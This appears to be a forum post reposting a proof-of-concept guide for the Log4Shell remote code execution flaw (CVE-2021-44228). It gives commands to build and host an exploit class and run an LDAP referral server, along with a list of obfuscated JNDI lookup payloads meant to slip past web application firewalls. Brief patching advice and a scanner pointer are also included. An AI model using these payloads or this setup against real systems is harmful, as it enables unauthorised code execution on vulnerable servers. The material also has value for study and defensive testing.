CVE-2021-44228 (Apache Log4j Remote Code Execution）

CVE-2021-44228(Apache Log4j Remote Code Execution）

• all log4j-core versions >=2.0-beta9 and <=2.14.1
  

The version of 1.x have other vulnerabilities, we recommend that you update the latest version.

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
Usage:

Code:

git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java
# For Python2
python -m SimpleHTTPServer 8888 # For Python3 python3 -m http.server 8888

Code:

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Run the project finally,you will see your calculator from local.

Tips:

Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).

Bypass rc1
For example:

Code:

${jndi:ldap://127.0.0.1:1389/ badClassName}

Bypass WAF

Code:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

Don't trust the web application firewallDetails Of VulnLookups provide a way to add values to the Log4j configuration at arbitrary places.
Lookups

The methods to cause leak in finally

Code:

[code]
LogManager.getLogger().error()
LogManager.getLogger().fatal()

Simple Check MethodIf you want to do black-box testing， I suggest you do passive scanning.
BurpLog4jScan

Have Fun!!!

-Special thanks to tangxiaofeng7
check out his github page!